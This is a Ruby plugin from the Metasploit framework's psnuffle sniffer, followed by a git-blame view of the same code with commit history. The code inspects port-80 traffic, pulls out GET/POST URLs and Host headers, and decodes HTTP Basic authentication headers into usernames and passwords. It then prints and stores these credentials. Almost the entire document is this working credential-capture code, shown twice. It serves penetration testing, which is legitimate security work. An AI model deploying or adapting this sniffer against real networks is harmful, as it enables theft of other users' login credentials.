data/exploits/psnuffle/url.rb

# Psnuffle password sniffer add-on class for HTTP URLs
# part of psnuffle sniffer auxiliary module

#
# Sniffer class for GET/POST URLs.
# Also extracts HTTP Basic authentication credentials.
#
class SnifferURL < BaseProtocolParser
  def register_sigs
    self.sigs = {
      :get        => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
      :post       => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i,
      :webhost	  => /^HOST:\s+([^\n\r]+)/i,
      :basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i,
    }
  end

  def parse(pkt)
    # We want to return immediately if we do not have a packet which is handled by us
    return unless pkt.is_tcp?
    return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80)
    s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))

    self.sigs.each_key do |k|

      # There is only one pattern per run to test
      matched = nil
      matches = nil

      if(pkt.payload =~ self.sigs[k])
        matched = k
        matches = $1
        sessions[s[:session]].merge!({k => matches})
      end

      case matched
      when :webhost
        sessions[s[:session]].merge!({k => matches})
        if s[:get]
          print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
        end
        if s[:post]
          print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}")
        end
        if s[:basic_auth]
          s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)
          report_cred(
            :ip  => s[:host],
            :port => s[:port],
            :service_name => 'http',
            :user => s[:user],
            :password => s[:pass],
            :type => :password,
            :proof => "Session: #{s[:session]} Basic Auth: #{s[:basic_auth]}",
            :status => Metasploit::Model::Login::Status::UNTRIED
          )
          print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"
        end
      when nil
        # No matches, no saved state
      end # end case matched
    end # end of each_key
  end # end of parse
end # end of URL sniffer
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`# Psnuffle password sniffer add-on class for HTTP URLs`
Updated pSnuffle sniffer code from _MAX_ 2009-08-19 14:07:33 +00:00			`# part of psnuffle sniffer auxiliary module`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00
Updated pSnuffle sniffer code from _MAX_ 2009-08-19 14:07:33 +00:00			`#`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`# Sniffer class for GET/POST URLs.`
			`# Also extracts HTTP Basic authentication credentials.`
Updated pSnuffle sniffer code from _MAX_ 2009-08-19 14:07:33 +00:00			`#`
Psnuffle modules 2009-07-17 20:39:06 +00:00			`class SnifferURL < BaseProtocolParser`
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`def register_sigs`
			`self.sigs = {`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,`
			`:post => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i,`
			`:webhost => /^HOST:\s+([^\n\r]+)/i,`
			`:basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i,`
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`}`
			`end`
Psnuffle modules 2009-07-17 20:39:06 +00:00
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`def parse(pkt)`
Fix typo 2018-07-17 12:59:00 -05:00			`# We want to return immediately if we do not have a packet which is handled by us`
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`return unless pkt.is_tcp?`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80)`
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))`
Psnuffle modules 2009-07-17 20:39:06 +00:00
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`self.sigs.each_key do \|k\|`
Fixes #423 . Using /s on a regex forces an encoding that cant match random binary gibberish 2009-11-02 17:59:45 +00:00
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`# There is only one pattern per run to test`
			`matched = nil`
			`matches = nil`
Psnuffle modules 2009-07-17 20:39:06 +00:00
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`if(pkt.payload =~ self.sigs[k])`
			`matched = k`
			`matches = $1`
			`sessions[s[:session]].merge!({k => matches})`
			`end`
Psnuffle modules 2009-07-17 20:39:06 +00:00
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`case matched`
			`when :webhost`
			`sessions[s[:session]].merge!({k => matches})`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`if s[:get]`
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`end`
			`if s[:post]`
			`print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}")`
			`end`
			`if s[:basic_auth]`
			`s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)`
Update deprecated report_auth_info method call in various modules in data/exploits/psnuffle/ 2023-09-25 02:51:08 +05:30			`report_cred(`
			`:ip => s[:host],`
Minor fixes to modules to use report_cred 2023-12-16 23:40:30 +05:30			`:port => s[:port],`
			`:service_name => 'http',`
Update deprecated report_auth_info method call in various modules in data/exploits/psnuffle/ 2023-09-25 02:51:08 +05:30			`:user => s[:user],`
			`:password => s[:pass],`
Minor fixes to modules to use report_cred 2023-12-16 23:40:30 +05:30			`:type => :password,`
Update deprecated report_auth_info method call in various modules in data/exploits/psnuffle/ 2023-09-25 02:51:08 +05:30			`:proof => "Session: #{s[:session]} Basic Auth: #{s[:basic_auth]}",`
Minor fixes to modules to use report_cred 2023-12-16 23:40:30 +05:30			`:status => Metasploit::Model::Login::Status::UNTRIED`
Update deprecated report_auth_info method call in various modules in data/exploits/psnuffle/ 2023-09-25 02:51:08 +05:30			`)`
Add support for HTTP POST and Basic Auth to psnuffle 2018-07-15 14:16:37 +00:00			`print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"`
Retab all the things (except external/) 2013-09-30 13:47:53 -05:00			`end`
			`when nil`
			`# No matches, no saved state`
			`end # end case matched`
			`end # end of each_key`
			`end # end of parse`
Psnuffle modules 2009-07-17 20:39:06 +00:00			`end # end of URL sniffer`